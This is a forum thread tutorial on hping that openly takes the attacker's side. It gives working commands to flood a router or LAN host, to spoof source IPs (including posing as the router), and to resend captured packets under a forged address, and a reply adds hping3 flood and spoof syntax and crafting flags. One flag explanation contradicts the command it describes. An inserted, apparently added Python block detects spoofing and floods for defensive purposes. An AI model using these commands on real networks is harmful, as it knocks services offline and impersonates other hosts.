[linux] Hping tutorial

02-19-2010, 05:22 PM   #1
CrashOverline

There are many tools for testing whether a network withstands attacks such as DoS, sniffing, spoofing, etc., and they significantly help an admin make the network as secure as it can be. At the same time, these tools can be a nightmare for an admin who has not taken the necessary steps. In short, what can be used for good purposes can also be used for bad ones. It depends on which side we are on and what we want. In this article we will take the side of the aggressor and use a very powerful tool, hping. For those who do not know what this tool does, I refer you here:

Code:
 http://en.wikipedia.org/wiki/Hping
First you should download hping (if you do not have it, naturally) from here:

Code:
http://www.hping.org/download.php
After you install it on your system, go to either a terminal (linux / unix) or the Command Prompt (cmd) on Windows.
The tutorial uses Fedora Linux; of course, the tool does not differ between systems.
To see which parameters this tool accepts, it is enough to type hping --help, which lists all the parameters and what each one does. We will certainly not analyze them all here, but you can experiment.

The following are some (not-so-innocent) uses of this tool.

DoS:
The fear and terror of an admin is having the network go down under a DoS attack, even one from inside the network. With this tool we can easily cause a DoS on some network device, making it unable to serve the network. Suppose we want to attack a network router; we type the following command.

Code:
hping --flood 192.168.2.1

The format is very simple. We just tell hping to send packets constantly to the router, in my case 192.168.2.1.
CAUTION: If you are connected to the internet, the connection will drop, but do not worry, it will come back.

We can add other parameters depending on what we want to do.
E.g. we can change the TTL, i.e. how many hops a packet may take to reach its destination, exactly how many packets will be sent, etc.

Code:
hping --flood --ttl 2 --count 100 192.168.2.1
In the above command we simply tell hping to send 100 packets in flood mode with TTL 2 to the router 192.168.2.1.

Of course there are other parameters, which you can find by typing hping --help.

Simple IP spoofing
With hping we can also execute IP spoofing attacks. We will perform a simple IP spoofing attack. (There is also blind IP spoofing, but it takes a lot of time and patience.)
That is, we will send a packet from our IP (192.168.2.29) to the router (192.168.2.1), having changed the source IP from 192.168.2.29 to any one we like, e.g. 192.168.2.100.

To execute IP spoofing attacks the syntax is again quite easy:

Code:
hping --spoof [fake source address] [destination address]
That is, if we want to carry out the example given above, it is sufficient to "give" the following command:

Code:
hping --spoof 192.168.2.100 192.168.2.1



And the results in WireShark.



As we have seen, a simple IP spoofing ....

IP spoofing & DoS mixed:
Now we will attack with IP spoofing & DoS simultaneously. That is, we will DoS another PC on the network with a spoofed IP address (we will use the router's address as the IP address), so the PC we flood will think that the requests come from the router and will send responses to it, with the same effect as described in the first case.

In more detail ..

Code:
hping --flood --spoof 192.168.2.1 --ttl 2 192.168.2.34
Let me explain ....
We flood normally as in the first case, but with a false IP (the router's IP), so that the PC thinks the requests come from the router and answers it, flooding it with packets and making it unable to serve the network ...

Sending custom packets:
With hping we can of course also send our own packets. What I mean: we capture a packet to a file with Wireshark, for example, and then give it to hping to send with a spoofed address. In more detail:

Code:
hping --spoof 192.168.2.100 -d 100 -E testfile 192.168.2.1
Let me explain ..
The --spoof parameter sets the fake address, -d is the packet size, -R is the file with the captured packet, and 192.168.2.1 is the target.
The packet I captured with Wireshark is a simple ICMP echo request packet (the packet sent when a computer pings).

And here is the result of this command in Wireshark ....




And of course you can combine these parameters with others not covered here; after all, that is why this tool is so powerful.


=======================================

I want to point out that the tutorial was translated with Google Translate from Greek into English.
I hope you understand...
I would have translated it directly into Romanian, but it is easier to understand in English.
__________________
Bau!
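
A defender's view of the flood and spoof cases in the post above, as an added example that is not part of the original post: on a single LAN segment a forged source IP still leaves the sender's own MAC address on the frame, so a sensor can compare each frame against an IP-to-MAC inventory and count frames per MAC. The MAC addresses, the inventory, the thresholds and the frame tuples are constructed for illustration.

```python
from collections import defaultdict, deque

# Assumed inventory of IP -> MAC bindings (e.g. from DHCP leases or static ARP).
KNOWN_BINDINGS = {
    "192.168.2.1": "00:11:22:33:44:01",   # router (constructed MAC)
    "192.168.2.29": "00:11:22:33:44:29",
    "192.168.2.34": "00:11:22:33:44:34",
}

def find_spoofed_sources(frames, bindings=KNOWN_BINDINGS):
    """Return sorted (src_ip, src_mac) pairs that contradict the inventory,
    including source IPs that are not in the inventory at all."""
    hits = set()
    for _ts, mac, src_ip, _dst in frames:
        if bindings.get(src_ip) != mac:
            hits.add((src_ip, mac))
    return sorted(hits)

def find_floods(frames, window=1.0, threshold=100):
    """Return {src_mac: peak_count} for MACs that sent more than `threshold`
    frames within `window` seconds. Keyed on MAC because the IP may be forged."""
    recent = defaultdict(deque)
    peak = defaultdict(int)
    for ts, mac, _src, _dst in sorted(frames):
        q = recent[mac]
        q.append(ts)
        while ts - q[0] > window:      # drop timestamps outside the window
            q.popleft()
        peak[mac] = max(peak[mac], len(q))
    return {mac: n for mac, n in peak.items() if n > threshold}

def build_sample():
    """Constructed capture: two normal frames, then the NIC of 192.168.2.29
    flooding 192.168.2.34 while claiming to be the router 192.168.2.1."""
    frames = [(0.0, "00:11:22:33:44:01", "192.168.2.1", "192.168.2.34"),
              (0.5, "00:11:22:33:44:34", "192.168.2.34", "192.168.2.1")]
    frames += [(1.0 + i * 0.001, "00:11:22:33:44:29", "192.168.2.1", "192.168.2.34")
               for i in range(500)]
    return frames

if __name__ == "__main__":
    sample = build_sample()
    print("binding violations:", find_spoofed_sources(sample))
    print("flooding MACs:", find_floods(sample))
```

The same binding can be enforced at the switch instead of only being detected, with DHCP snooping plus IP source guard or dynamic ARP inspection. A sender that also forges its MAC address defeats the inventory check, which is why the flood counter is kept separately.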

Re: [linux] Hping tutorial
02-19-2010, 07:14 PM   #2
pyth0n3

Hping3 supports the --flood option, and the syntax is
Code:
hping3  --flood 192.168.0.1
It will send packets continuously and quickly.

Spoofing in Hping3
Code:
hping3    --spoof 192.168.0.2 --icmp-ts 192.168.0.1
Specific packets can also be specified; in this case I specified an ICMP timestamp request.

But there can be others too
Code:
ICMP
  -C  --icmptype   icmp type (default echo request)
  -K  --icmpcode   icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help  display help for others icmp options
UDP/TCP
  -s  --baseport   base source port             (default random)
  -p  --destport   [+][+]<port> destination port(default 0) ctrl+z inc/dec
  -k  --keep       keep still source port
  -w  --win        winsize (default 64)
  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  -Q  --seqnum     shows only tcp sequence number
  -b  --badcksum   (try to) send packets with a bad IP checksum
                   many systems will fix the IP checksum sending the packet
                   so you'll get bad UDP/TCP checksum instead.
  -M  --setseq     set TCP sequence number
  -L  --setack     set TCP ack
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag
  -U  --urg        set URG flag
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp->th_flags as exit code
  --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
It is a pretty powerful tool for doing various things, but you will also need to use a sniffer to analyze the packets sent and the responses received.
It is a scanner used against servers that use a firewall or IDS, to analyze their behavior.
__________________
Enter pyth0n3's blog
"It is much more secure to be feared than to be loved. "

Niccolò Machiavelli